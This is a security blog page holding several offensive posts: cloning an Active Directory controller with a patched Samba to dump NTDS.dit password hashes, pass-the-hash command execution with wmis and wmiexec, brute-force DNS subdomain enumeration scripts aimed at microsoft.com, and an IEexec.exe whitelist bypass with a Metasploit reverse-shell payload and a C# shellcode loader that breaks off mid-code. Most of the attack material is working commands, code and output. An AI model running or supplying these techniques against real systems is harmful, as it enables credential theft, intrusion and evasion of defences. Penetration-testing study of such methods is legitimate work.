Room362.com

Blatherings of a security addict.

Installing PyCrypto on OSX Mavericks

| Comments

Keeping it here for notes and just in case anyone else runs into this same issue.

1
2

brew install pip
sudo ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future pip install pycrypto

If you have a better way please leave a comment below!

CCDC Red Teamer’s Creed

| Comments

This is my box. There are many like it, but they are all mine.

My malware is my best friend. It is my life. I must master it as I must master my life.

My malware, without me, is useless. Without my malware, I am useless. I must drop my malware true. I must rootkit better than my enemy who is trying to kill my binary. I must kit him before he kits me. I will…

My malware and I know that what counts in this war is not the boxes we pop, the noise of our root dance, nor the cheers coming from the Red Team room. We know that it is the root that count. We will root…

My malware is human, even as I, because it is my life. Thus, I will learn it as a brother. I will learn its weaknesses, its strength, its parts, its extensions, its dlls and its exes. I will keep my malware av free and ready, even as I am ready. We will become part of each other. We will…

Before God, I swear this creed. My malware and I are the defenders of my botnet. We are the masters of our enemy. We are the saviors of my shells.

So be it, until victory is the Red Team’s and there is no enemy, but peace!

Dumping NTDS.dit Domain Hashes Using Samba

| Comments

So there was this blog post that talking about a number of ways to dump windows credentials by @lanjelot [definitly someone to follow] – here: https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/ and at the very bottom of this post it says “AD Replication (EXPERIMENTAL)

What it boils down to is if you can position a system that can do DNS resolution to the target domain, and perform some other UDP traffic, you can fake join a samba server you control to a domain and it doesn’t require code execution in any way on the domain controller.

Notice: I am not doing this on a Kali Linux box, there is already an install of Samba there and I didn’t want to try uninstalling or modifying the one installed.

First, you need this patch:

wget http://files.securusglobal.com/samba-4.1.0_replication-only-patch.txt

and Samba 4.1.0

wget http://ftp.samba.org/pub/samba/stable/samba-4.1.0.tar.gz

You will probably also require some dependencies to be installed:

apt-get install python2.7-dev python-samba libacl1-dev build-essential libldap2-dev libkrb5-dev attr

Since the patch is kinda wonky, you need to make a src directory and extract samba into there first. Then apply the patch in whatever directory is above src

1
2
3
4
5

mkdir src
mv samba-4.1.0.tar.gz src/
cd src/
tar zxvf samba-4.1.0.tar.gz
cd /root/

So it would look like this:

1
2
3

samba-4.1.0_replication-only-patch.txt
src/
src/samba-4.1.0/

then run patch -p0 < samba-4.1.0_replication-only-patch.txt

1
2
3
4

cd ./src/samba-4.1.0/
./configure
make
make install

Prepare the box:

1

rm -rf /var/lib/samba; mkdir /var/lib/samba; rm -f /etc/samba/smb.conf

Next you need to make sure you are resolving correctly (if you can’t resolve the SRV record _ldap._tcp.sittingduck.info (sittingduck.info being the domain) then this isn’t going to work.

1

echo nameserver 192.168.92.37 > /etc/resolv.conf # this is the IP address of the DC

Then start the clone:

1

/usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator

Looks like this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

root@sambabox:~/src/samba-4.1.0# /usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator
Finding a writeable DC for domain 'sittingduck.info'
Found DC 2K8DC.sittingduck.info
Password for [SITTINGDUCK\administrator]:
workgroup is SITTINGDUCK
realm is sittingduck.info
Calling bare provision
No IPv6 address will be assigned
Provision OK for domain DN DC=sittingduck,DC=info
Starting replication
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1521] linked_values[0]
Analyze and apply schema objects
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1608] linked_values[1]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1614] linked_values[11]
Replicating critical objects from the base DN of the domain
Partition[DC=sittingduck,DC=info] objects[100] linked_values[24]
Partition[DC=sittingduck,DC=info] objects[353] linked_values[27]
Done with always replicated NC (base, config, schema)
Committing SAM database
descriptor_sd_propagation_recursive: DC=DomainDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
descriptor_sd_propagation_recursive: DC=ForestDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
Joined domain SITTINGDUCK (SID S-1-5-21-3147519476-3247671789-820278723) as a DC

Then to get the hashes:

1
2
3
4
5
6
7
8

root@sambabox:~# /usr/local/samba/bin/pdbedit -L -w
2K8DC$:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:CB14F1166BBE1749AC0FB40240C5DC30:[S          ]:LCT-530FC425:
Administrator:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[U          ]:LCT-531006A4:
krbtgt:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:F2EE6AB6F40810169E0E46B126CEFBEF:[DU         ]:LCT-530FC3FF:
nobody:65534:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:[U          ]:LCT-00000000:
jdoe:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-530FC5FF:
uber:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-53101261:

Or you can do it with history:

1
2
3
4
5
6
7
8
9

root@sambabox:~# python samba-pwdump.py /usr/local/samba/private/sam.ldb.d/DC\=SITTINGDUCK\,DC\=INFO.ldb -history
SAMBACLONE$:1104:::::
2K8DC$:1000::cb14f1166bbe1749ac0fb40240c5dc30:::
Administrator:500::88e4d9fabaecf3dec18dd80905521b29:::
krbtgt:502::f2ee6ab6f40810169e0e46b126cefbef:::
Guest:501:::::
jdoe:1103::88e4d9fabaecf3dec18dd80905521b29:::
uber:1105::88e4d9fabaecf3dec18dd80905521b29:::
uber_history0:1105:444d1edcad01ae08f49f073e12e8cc14:88e4d9fabaecf3dec18dd80905521b29:::

Game over. The great thing is that it never actually shows up as a joined box in the domain, and as far as I can tell the only log on the real DC is the login success of a domain admin. Plus one of the huge benefits to this method is that once you have the database Samba makes it really easy to query information like group membership or users info after the fact, not just hashes.

Executing Code via SMB / DCOM Without PSEXEC

| Comments

PSEXEC has been a staple for Windows post exploitation pivoting and system administration for a long while. The basic premise of how all “psexec” tools work is:

  1. (Optional) Upload a service executable (PSEXECSVC.EXE in the case of SysInternal’s tool) to the ADMIN$ share
  2. Connect to the service manager on the remote host, and create a service based on either a local (to the remote system) executable or the uploaded one.
  3. Run the service
  4. Stop and delete the service and uploaded file pulling down the resulting output if any from the execution.

Now, as you can guess, the uploading of a file, creating, starting, stopping, and deletion of services create quite the logs and forensic evidence.

As you might imagine, thats not the best thing for us on the offensive side of infosec. Luckily big brother Microsoft provides another option, WMI (Windows Management Interface). I demonstrated the use of this in the past: HERE and HERE

The downside to using the WMIC directly is that you need a valid token or a valid password for it to work. Passing the hash didn’t used to be an available option.

That has changed with the “wmis” package on Kali Linux that incorporates the “Pass-the-Hash for 15 years toolkit”

(There is a slight problem where you have to play with it a bit to get it working on 64 bit Kali)

The other solution is supplied as an example in the Impacket library “wmiexec.py”. In my experience there are a few features that make it the better option.

  1. Installing it on a random VPS is dead simple and doesn’t need the Kali repos to get right, nor Debian/Ubuntu.
  2. It defaults to an “semi-interactive shell” which writes and reads output from the ADMIN$ shell by default. Something I would normally have to do manually with a bunch of tools
  3. As with the WMIS package, it allows you to just create a process without the ADMIN$ write/read.

Enough crazy talk here is an example usage of each:

WMIS

Usage:

1
2
3
4
5
6
7
8
9
10
11

root@wpad:~# wmis
Usage: [-?NPV] [-?|--help] [--usage] [-d|--debuglevel=DEBUGLEVEL] [--debug-stderr] [-s|--configfile=CONFIGFILE]
        [--option=name=value] [-l|--log-basename=LOGFILEBASE] [--leak-report] [--leak-report-full]
        [-R|--name-resolve=NAME-RESOLVE-ORDER] [-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME]
        [-W|--workgroup=WORKGROUP] [--realm=REALM] [-i|--scope=SCOPE] [-m|--maxprotocol=MAXPROTOCOL]
        [-U|--user=[DOMAIN\]USERNAME[%PASSWORD]] [-N|--no-pass] [--password=STRING] [-A|--authentication-file=FILE]
        [-S|--signing=on|off|required] [-P|--machine-pass] [--simple-bind-dn=STRING] [-k|--kerberos=STRING]
        [--use-security-mechanisms=STRING] [-V|--version]
        //host

Example: wmis -U [domain/]adminuser%password //host cmd.exe /c dir c:\ > c:\windows\temp\output.txt

Example:

1
2
3
4
5

root@wpad:~# wmis -U administrator%aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 //172.16.102.141 calc.exe
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
[wmi/wmis.c:172:main()] 1: calc.exe
NTSTATUS: NT_STATUS_OK - Success

wmiexec.py

Using a password, but with hashes you just tell it -hashes :

Usage:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

root@wpad:~/impacket/examples# ./wmiexec.py 
Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies

usage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-hashes LMHASH:NTHASH]
                  target [command [command ...]]

positional arguments:
  target                [domain/][username[:password]@]<address>
  command               command to execute at the target. If empty it will
                        launch a semi-interactive shell

optional arguments:
  -h, --help            show this help message and exit
  -share SHARE          share where the output will be grabbed from (default
                        C$)
  -nooutput             whether or not to print the output (no SMB connection
                        created)

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

Example:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

root@wpad:~/impacket/examples# ./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 administrator@172.16.102.141
Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies

SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 5CCA-B528

 Directory of C:\

07/13/2009  11:20 PM    <DIR>          PerfLogs
10/07/2013  03:26 PM    <DIR>          Program Files
07/14/2009  01:08 AM    <DIR>          Program Files (x86)
04/25/2014  02:21 AM    <DIR>          Users
05/11/2014  03:39 PM    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  52,884,389,888 bytes free

C:\>

Iterative DNS Brute Forcing

| Comments

Everyone has their list of hostnames they brute force domains with. In my last post I even mentioned a few ways to use one with XARGS or PARALLEL. But one fact about wordlist brute forcing is that there is no “one list to rule them all”. But over the years of doing DNS record collection I have noticed one thing, most domains have a large number of short hostnames that are easy to remember, usually 4 characters or less.

I’m sure you already know where I’m going with this, I wanted to brute force all possible hostnames up to 4 characters. For a long time I struggled with coding this, but couldn’t wrap my head around it. I would come back to it every so often, finally a few days ago I happened upon a script on gist: https://gist.github.com/petehamilton/4755855 that suited my needs perfectly.

I modified it to suite my needs (just use the yield method) and here is what I ended up with (remember DNS is case insensitive):

Notice: This script doesn’t end, it will keep doing lookups on longer and longer hostnames until you hit CTRL-C

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

#!/usr/bin/env ruby

#
## Brute code stolen form: https://gist.github.com/petehamilton/4755855
#

@domain = 'microsoft.com'

def result?(sub)
  results = %x(dig +noall #{sub}.#{@domain} +answer)
  if results != ""
      puts "============================"
      puts "FOUND: \t#{sub}"
      puts "============================"
      puts "#{results}"
      puts "============================"
  end
  1 == 2
end

def crack_yielding(chars)
  crack_yield(chars){ |p|
      return p if result?(p)
  }
end


def crack_yield(chars)
  chars.each { |c| yield c }

  crack_yield(chars) { |c|
      chars.each do |x|
          yield c + x
      end
  }
end

chars = ('a'..'z').to_a
(0..9).each {|x| chars << x.to_s} 

crack_yielding(chars)

This worked but it was slow, so I sped it up using methods that I talked about in my last post and a quick modification:

I used this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

#!/usr/bin/env ruby

#
## Brute code stolen form: https://gist.github.com/petehamilton/4755855
#

def result?(sub)
  puts sub    
  1 == 2
end

def crack_yielding(chars)
  crack_yield(chars){ |p|
      return p if result?(p)
  }
end


def crack_yield(chars)
  chars.each { |c| yield c }

  crack_yield(chars) { |c|
      chars.each do |x|
          yield c + x
      end
  }
end

chars = ('a'..'z').to_a
(0..9).each {|x| chars << x.to_s} 

crack_yielding(chars)

which just prints all the possibilities:

1
2
3
4
5
6
7

a
b
c
d
e
f
...

and piped it into parallel + dig:

1

ruby brutelist.rb | parallel -j100 dig +noall {}.microsoft.com +answer

and got the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

c.microsoft.com. 2   IN  CNAME   c.microsoft.akadns.net.
c.microsoft.akadns.net.   499 IN  A   65.55.58.184
e.microsoft.com.  3599    IN  A   191.234.1.50
g.microsoft.com.  2798    IN  CNAME   g.msn.com.
g.msn.com.        99  IN  CNAME   g.msn.com.nsatc.net.
g.msn.com.nsatc.net.  148 IN  A   131.253.34.154
i.microsoft.com.  779 IN  CNAME   i.toggle.www.ms.akadns.net.
i.toggle.www.ms.akadns.net. 44    IN  CNAME   i.g.www.ms.akadns.net.
i.g.www.ms.akadns.net.    225 IN  CNAME   i.microsoft.com.edgesuite.net.
i.microsoft.com.edgesuite.net. 116 IN CNAME   a1475.g.akamai.net.
a1475.g.akamai.net.   16  IN  A   23.45.65.26
a1475.g.akamai.net.   16  IN  A   23.45.65.33
m.microsoft.com.  3599    IN  CNAME   origin.mobile.ms.akadns.net.
origin.mobile.ms.akadns.net. 299 IN   A   65.55.186.235
s.microsoft.com.  3599    IN  CNAME   reroute.microsoft.com.
reroute.microsoft.com.    3599    IN  A   65.55.58.201
reroute.microsoft.com.    3599    IN  A   64.4.11.37
cs.microsoft.com. 81  IN  CNAME   wedcs.trafficmanager.net.
wedcs.trafficmanager.net. 7   IN  CNAME   wedcseus.cloudapp.net.
wedcseus.cloudapp.net.    8   IN  A   137.116.48.250
...

Happy bruting. Both scripts can be found on my gists page:

Hostname Bruteforcing on the Cheap

| Comments

Quick update: As @MikeDamm points out, xargs has a -P option that can do the same thing I’m using parallel for. If you have a supported version of xargs you can use -P 0 to do the same thing as -j0 with parallel, but if your version doesn’t support the 0 you can simply use the same number parallel uses ala:

  • cat subdomains.txt | xargs -P 122 -I subdomain dig +noall subdomain.microsoft.com +answer

This results in roughly the same completion time as it’s parallel counterpart. Thanks @MikeDamm!

There are some great discussions on the NoVA Hackers mailing list. One such discussion was about what the best way to do dns hostname brute forcing was and which tool is better than another. For me, I just use the command line and then parse the results (or just ask the deepmagic.com database ;–)

Here is what I do:

First, you need a good list of DNS sub domains / hostnames. Personally I use the list provided over at http://www.ethicalhack3r.co.uk/zone-transfers-on-the-alexa-top-1-million/ (with a few minor tweaks). If you haven’t read that post and follow-on posts you really should. But take the list and save it locally. Then just run the following command:

  • cat subdomains.txt | xargs -t -I subdomain dig +noall subdomain.microsoft.com +answer

Now, xargs is great but does one thing at a time and can be quite slow if your subdomains list is large. With the use of the amazing tool GNU parallel you can get done in a matter of seconds, well, that or knock over your home router.

  • cat subdomains.txt | parallel -k -j0 dig +noall {}.microsoft.com +answer

Warning: the -j0 option maxes out the possible file handles and jobs that your CPU/kernel can handle, which usually destroys VMs. Just a smaller job count like 100 or 50 if you want the speed without the crash ;–)

with an output something list this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146

parallel: Warning: Only enough file handles to run 122 jobs in parallel.
Raising ulimit -n or /etc/security/limits.conf may help.
parallel: Warning: No more file handles. Raising ulimit -n or /etc/security/limits.conf may help.
mail.microsoft.com.   2369    IN  A   131.107.125.5
www.microsoft.com.    0   IN  CNAME   toggle.www.ms.akadns.net.
toggle.www.ms.akadns.net. 0   IN  CNAME   g.www.ms.akadns.net.
g.www.ms.akadns.net.  0   IN  CNAME   lb1.www.ms.akadns.net.
lb1.www.ms.akadns.net.    263 IN  A   64.4.11.42
m.microsoft.com.  0   IN  CNAME   origin.mobile.ms.akadns.net.
origin.mobile.ms.akadns.net. 300 IN   A   65.55.186.235
ftp.microsoft.com.    0   IN  CNAME   ftp.microsoft.akadns.net.
ftp.microsoft.akadns.net. 259 IN  A   64.4.17.176
mobile.microsoft.com. 0   IN  CNAME   origin.mobile.ms.akadns.net.
origin.mobile.ms.akadns.net. 300 IN   A   65.55.186.235
smtp.microsoft.com.   3600    IN  A   131.107.115.215
smtp.microsoft.com.   3600    IN  A   131.107.115.214
smtp.microsoft.com.   3600    IN  A   205.248.106.64
smtp.microsoft.com.   3600    IN  A   205.248.106.30
smtp.microsoft.com.   3600    IN  A   205.248.106.32
smtp.microsoft.com.   3600    IN  A   131.107.115.212
search.microsoft.com. 0   IN  CNAME   search.microsoft.akadns.net.
search.microsoft.akadns.net. 0    IN  CNAME   search.msn.com.edgesuite.net.
search.msn.com.edgesuite.net. 0   IN  CNAME   a134.g.akamai.net.
a134.g.akamai.net.    19  IN  A   209.107.220.27
a134.g.akamai.net.    19  IN  A   209.107.220.35
dev.microsoft.com.    0   IN  CNAME   msdn.microsoft.com.
msdn.microsoft.com.   0   IN  CNAME   msdn.microsoft.akadns.net.
msdn.microsoft.akadns.net. 600    IN  A   157.56.148.19
img.microsoft.com.    0   IN  CNAME   i.microsoft.com.edgesuite.net.
i.microsoft.com.edgesuite.net. 0 IN   CNAME   a1475.g.akamai.net.
a1475.g.akamai.net.   20  IN  A   165.254.158.48
a1475.g.akamai.net.   20  IN  A   165.254.158.9
news.microsoft.com.   0   IN  CNAME   msnews.microsoft.com.
msnews.microsoft.com. 3600    IN  A   207.46.248.16
mail2.microsoft.com.  3600    IN  A   131.107.115.215
beta.microsoft.com.   0   IN  CNAME   connect.microsoft.akadns.net.
connect.microsoft.akadns.net. 300 IN  A   65.52.103.84
support.microsoft.com.    0   IN  CNAME   mso-geo.microsoft.akadns.net.
mso-geo.microsoft.akadns.net. 0   IN  CNAME   support.microsoft.akadns.net.
support.microsoft.akadns.net. 175 IN  A   157.56.56.139
my.microsoft.com. 3600    IN  A   134.170.255.29
help.microsoft.com.   0   IN  CNAME   help.msn.com.
mail3.microsoft.com.  3600    IN  A   131.107.115.214
download.microsoft.com.   0   IN  CNAME   download.microsoft.com.nsatc.net.
download.microsoft.com.nsatc.net. 0 IN    CNAME   main.dl.ms.akadns.net.
main.dl.ms.akadns.net.    0   IN  CNAME   download.microsoft.com.edgesuite.net.
download.microsoft.com.edgesuite.net. 0   IN CNAME a954.dscms.akamai.net.
a954.dscms.akamai.net.    0   IN  CNAME   a954.dscms.akamai.net.0.1.cn.akamaitech.net.
a954.dscms.akamai.net.0.1.cn.akamaitech.net. 1 IN A 69.31.75.184
a954.dscms.akamai.net.0.1.cn.akamaitech.net. 1 IN A 69.31.75.168
shop.microsoft.com.   3600    IN  A   64.4.11.37
shop.microsoft.com.   3600    IN  A   65.55.58.201
games.microsoft.com.  3600    IN  A   207.46.166.10
business.microsoft.com.   3600    IN  A   65.55.57.98
ws.microsoft.com. 0   IN  CNAME   ws.microsoft.com.nsatc.net.
gateway.microsoft.com.    3600    IN  A   131.107.16.142
gateway.microsoft.com.    3600    IN  A   131.107.16.143
members.microsoft.com.    0   IN  CNAME   members.microsoft.akadns.net.
members.microsoft.akadns.net. 219 IN  A   65.55.57.28
c.microsoft.com.  0   IN  CNAME   c.microsoft.akadns.net.
c.microsoft.akadns.net.   215 IN  A   65.55.58.199
g.microsoft.com.  0   IN  CNAME   g.msn.com.
g.msn.com.        0   IN  CNAME   g.msn.com.nsatc.net.
g.msn.com.nsatc.net.  142 IN  A   131.253.34.154
mail4.microsoft.com.  3600    IN  A   205.248.106.64
mail1.microsoft.com.  3600    IN  A   131.107.115.212
apps.microsoft.com.   0   IN  CNAME   apps.windows.akadns.net.
apps.windows.akadns.net. 0    IN  CNAME   services.windows.akadns.net.
services.windows.akadns.net. 0    IN  CNAME   services-perf.windows.akadns.net.
services-perf.windows.akadns.net. 46 IN   A   134.170.30.204
email.microsoft.com.  1989    IN  A   157.55.150.73
i.microsoft.com.  0   IN  CNAME   i.toggle.www.ms.akadns.net.
i.toggle.www.ms.akadns.net. 0 IN  CNAME   i.g.www.ms.akadns.net.
i.g.www.ms.akadns.net.    0   IN  CNAME   i.microsoft.com.edgesuite.net.
i.microsoft.com.edgesuite.net. 0 IN   CNAME   a1475.g.akamai.net.
a1475.g.akamai.net.   8   IN  A   23.62.111.114
a1475.g.akamai.net.   8   IN  A   23.62.111.104
s.microsoft.com.  0   IN  CNAME   reroute.microsoft.com.
reroute.microsoft.com.    3600    IN  A   64.4.11.37
reroute.microsoft.com.    3600    IN  A   65.55.58.201
community.microsoft.com. 0    IN  CNAME   communities.microsoft.com.
communities.microsoft.com. 3600   IN  A   64.4.11.37
communities.microsoft.com. 3600   IN  A   65.55.58.201
connect.microsoft.com.    0   IN  CNAME   connect.microsoft.akadns.net.
connect.microsoft.akadns.net. 152 IN  A   65.52.103.84
rss.microsoft.com.    796 IN  A   65.55.58.201
rss.microsoft.com.    796 IN  A   64.4.11.37
home.microsoft.com.   0   IN  CNAME   redir.blu.cb3.glbdns.microsoft.com.
redir.blu.cb3.glbdns.microsoft.com. 116   IN A    65.55.206.229
jp.microsoft.com. 3600    IN  A   65.55.58.201
jp.microsoft.com. 3600    IN  A   64.4.11.37
labs.microsoft.com.   3600    IN  A   64.4.11.37
labs.microsoft.com.   3600    IN  A   65.55.58.201
exchange.microsoft.com.   2120    IN  A   65.55.31.35
marketing.microsoft.com. 3600 IN  A   207.46.242.110
mac.microsoft.com.    3600    IN  A   64.4.11.37
mac.microsoft.com.    3600    IN  A   65.55.58.201
feeds.microsoft.com.  3600    IN  A   65.55.57.98
partners.microsoft.com.   0   IN  CNAME   pmc.partners.microsoft.akadns.net.
pmc.partners.microsoft.akadns.net. 300 IN A   131.107.119.14
feed.microsoft.com.   0   IN  CNAME   feed.trafficmanager.net.
feed.trafficmanager.net. 0    IN  CNAME   feedna.cloudapp.net.
feedna.cloudapp.net.  10  IN  A   65.52.9.172
partner.microsoft.com.    0   IN  CNAME   portal.partners.microsoft.akadns.net.
portal.partners.microsoft.akadns.net. 300 IN A    131.107.119.163
cs.microsoft.com. 0   IN  CNAME   wedcs.trafficmanager.net.
wedcs.trafficmanager.net. 0   IN  CNAME   wedcseus.cloudapp.net.
wedcseus.cloudapp.net.    10  IN  A   137.116.48.250
forums.microsoft.com. 0   IN  CNAME   forums.microsoft.akadns.net.
forums.microsoft.akadns.net. 600 IN   A   65.52.103.99
meet.microsoft.com.   3600    IN  A   131.107.1.71
e.microsoft.com.  3600    IN  A   191.234.1.50
autodiscover.microsoft.com. 2358 IN   A   131.107.125.5
im.microsoft.com. 3600    IN  A   131.107.1.75
sip.microsoft.com.    2228    IN  A   65.55.30.130
me.microsoft.com. 0   IN  CNAME   edm.cloudapp.net.
dig: 'm..microsoft.com' is not a legal name (empty label)
billing.microsoft.com.    0   IN  CNAME   paymenthubprod.trafficmanager.net.
paymenthubprod.trafficmanager.net. 0 IN   CNAME   paymenthubuxprod1.cloudapp.net.
paymenthubuxprod1.cloudapp.net.   10 IN   A   168.62.198.20
profile.microsoft.com.    0   IN  CNAME   profile.microsoft.akadns.net.
profile.microsoft.akadns.net. 335 IN  A   64.4.11.47
research.microsoft.com.   806 IN  A   131.107.65.14
sharepoint.microsoft.com. 3463    IN  A   64.4.6.100
sharepoint.microsoft.com. 3463    IN  A   65.55.39.10
appdev.microsoft.com. 0   IN  CNAME   appdev.windows.akadns.net.
appdev.windows.akadns.net. 131    IN  A   134.170.30.200
newsletters.microsoft.com. 3150   IN  A   207.46.248.35
advertising.microsoft.com. 0  IN  CNAME   advertising.microsoft.com.nsatc.net.
advertising.microsoft.com.nsatc.net. 245 IN A 65.52.100.46
catalog.microsoft.com.    0   IN  CNAME   genuine.microsoft.akadns.net.
genuine.microsoft.akadns.net. 300 IN  A   65.55.58.177
social.microsoft.com. 0   IN  CNAME   lb.social.ms.akadns.net.
lb.social.ms.akadns.net. 54   IN  A   65.52.103.78
events.microsoft.com. 1776    IN  A   64.4.11.31
events.microsoft.com. 1776    IN  A   65.55.58.192
ajax.microsoft.com.   0   IN  CNAME   mscomajax.vo.msecnd.net.
mscomajax.vo.msecnd.net. 208  IN  A   65.54.81.164
mscomajax.vo.msecnd.net. 208  IN  A   65.54.81.12
developer.microsoft.com. 0    IN  CNAME   msdn.microsoft.com.
msdn.microsoft.com.   0   IN  CNAME   msdn.microsoft.akadns.net.
msdn.microsoft.akadns.net. 600    IN  A   157.56.148.19
bbs.microsoft.com.    0   IN  CNAME   transfer.microsoft.com.
transfer.microsoft.com.   3600    IN  A   64.4.10.152
backoffice.microsoft.com. 3600    IN  A   64.4.11.37
backoffice.microsoft.com. 3600    IN  A   65.55.58.201

Application Whitelist Bypass Using IEexec.exe

| Comments

Guest post by @infosecsmith2

There was a recent presentation at DerbyCon, entitled:

Living Off the Land: A Minimalist’s Guide to Windows Post-Exploitation by Christopher Campbell & Matthew Graeber

I highly recommend that you start with this presentation as it lays the foundation for this post.

The premise is, how can we maintain persistence in a corporate environment, using tools and defaults provided by the host OS we have compromised. This is a very important concept, given the shift in many organizations to an Application Whitelisting Defense model.

It is only a matter of time before time before you might encounter an Application Whitelisting Defense.

As a follow up to that presentation, I began exploring the binaries that ship by default with Windows. That is where I stumbled across a binary in the C:\Windows\Microsoft.NET\Framework64\v2.0.50727 path.

The Executable is ieexec.exe. A write up is here: http://support.microsoft.com/kb/822485

“The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.”

Excellent! So, now we just need to host our malicious binary , and call it from ieexec.exe.

This is great, since most Application Whitelisting Environments are going to “Trust” anything signed my Microsoft as a matter of convenience. IEexec.exe will download and execute our code for us, all under the trusted process.

So lets get started!

Step 1. Prepare your Shellcode, or whatever malicious app you want. I compiled my executable using SharpDevelop, since it has less footprint than a full blown Visual Studio install. From msfconsole:

1
2
3
4
5
6
7
8

msf > use windows/x64/shell/reverse_tcp
msf payload(reverse_tcp) > set LHOST x.x.x.x
msf payload(reverse_tcp) > set LPORT 443
msf payload(reverse_tcp) > generate -t csharp
byte[] buf = new byte[422] { 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52...

 <Snipped Full ShellCode for Brevity>

Step 2. Create the .NET wrapper application

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86

using System;
using System.Runtime.InteropServices;
namespace native
{
    class Program
    {
            private static UInt32 MEM_COMMIT = 0x1000;
            private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
            private static UInt32 MEM_RELEASE = 0x8000;

        public static void Main(string[] args)
        {
            // native function's compiled code 

            byte[] proc = new byte[] {
                0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52...

            //Edited ShellCode For Brevity 
            };

            UInt32 funcAddr = VirtualAlloc(0, (UInt32)proc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(proc, 0, (IntPtr)(funcAddr), proc.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;

            // prepare data 

            PROCESSOR_INFO info = new PROCESSOR_INFO();
            IntPtr pinfo = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(PROCESSOR_INFO)));
            Marshal.StructureToPtr(info, pinfo, false);

            // execute native code 

            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);

            // retrive data 

            info = (PROCESSOR_INFO)Marshal.PtrToStructure(pinfo, typeof(PROCESSOR_INFO));
            Marshal.FreeHGlobal(pinfo);
            CloseHandle(hThread);
            VirtualFree((IntPtr)funcAddr, 0, MEM_RELEASE);
        }

        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

        [DllImport("kernel32")]
        private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);

        [DllImport("kernel32")]
